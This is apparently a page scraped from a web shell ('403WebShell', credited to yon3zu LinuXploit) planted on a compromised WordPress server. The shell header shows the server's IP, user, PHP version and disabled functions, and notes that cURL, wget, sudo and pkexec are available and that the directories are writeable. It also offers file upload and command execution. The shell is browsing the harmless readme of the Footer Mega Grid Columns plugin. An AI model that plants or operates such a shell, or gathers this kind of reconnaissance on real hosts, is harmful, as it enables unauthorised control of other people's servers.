Uname:Linux Sandbox-A 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64

Base Dir : /var/www/html

User : gavin


403WebShell
403Webshell
Server IP : 68.183.124.220  /  Your IP : 216.73.217.137
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux Sandbox-A 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : gavin ( 1000)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/wp-content/plugins/footer-mega-grid-columns/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/wp-content/plugins/footer-mega-grid-columns//readme.txt
=== Footer Mega Grid Columns ===
Tags: footer, footer widgets, footer widgets in grid, website footer, simple footer editor, mega footer, megafooter
Contributors: wponlinesupport, anoopranawat, pratik-jain
Requires at least: 3.5
Tested up to: 5.2
Stable tag: trunk
License: GPLv2 or later
License URI: http://www.gnu.org/licenses/gpl-2.0.html

Footer Mega Grid Columns - Register a footer widget area for your theme and allow you to add and display footer widgets in grid view with multiple columns

== Description ==
Is your footer stuck in the default "1 or 2 columns" that came with your theme?

Footer Mega Grid Columns is a free plugin which allows you to create footer areas in grid depending upon the requirement of your theme.

Footer Mega Grid Columns - Register a footer widget area for your theme and allow you to add and display footer widgets in grid view with multiple columns.

The site footer is a valuable piece of site real estate, often containing important lead generating items such as mailchimp and social. A well designed footer can be a tremendous benefit.

Check footer [DEMO](https://www.wponlinesupport.com/wp-plugin/footer-mega-grid-columns/) | [PRO DEMO](https://www.wponlinesupport.com/wp-plugin/footer-mega-grid-columns/) for additional information.

= How to display footer grid =
Add the following code in your footer.php 
<pre><code><?php if( function_exists('slbd_display_widgets') ) { echo slbd_display_widgets(); } ?></code></pre>

= Features =
* Add a Footer widget ie Footer Mega Grid Columns .
* Display all widgets in grid 1,2,3,4 etc under Footer Mega Grid Columns.
* Can be used with most of the themes.
* Third party widget can be added.

= How to install : =
[youtube https://www.youtube.com/watch?v=52Q0IHcnxVo] 


== Installation ==

1. Upload the 'footer-mega-grid-columns' folder to the '/wp-content/plugins/' directory.
2. Activate the "Footer Mega Grid Columns" list plugin through the 'Plugins' menu in WordPress.
3. Check you Widget section for widget name Footer Mega Grid Columns.
4. Add the following code in your footer.php file under <code><footer></code> tag.
<pre>
 if( function_exists('slbd_display_widgets') ) { echo slbd_display_widgets(); }
</pre>
= How to install : =
[youtube https://www.youtube.com/watch?v=52Q0IHcnxVo] 

== Frequently Asked Questions ==

= Footer is displaying in the full width. How to add in wrap? =

Yes. We have added a CSS class - 'footer-mega-col-wrap' and given a width 100%. You can take the class in your theme style.css file OR in custom css section.
Ues like this 
<code>.footer-mega-col-wrap{max-width:1100px;}</code>

== Screenshots ==

1. Widget
2. Footer with 3 col
3. Footer with 4 col

== Changelog ==

= 1.1.1 (28-10-2017) =
* [+] Added support for 5 columns

= 1.0.1 (31-01-2017) =
* [+] Added ::after and ::before to .footer-mega-col class
* [+] Added .footer-mega-col-wrap new class under footer-mega-col class

= 1.0 =
* Initial release.

Youez - 2016 - github.com/yon3zu
LinuXploit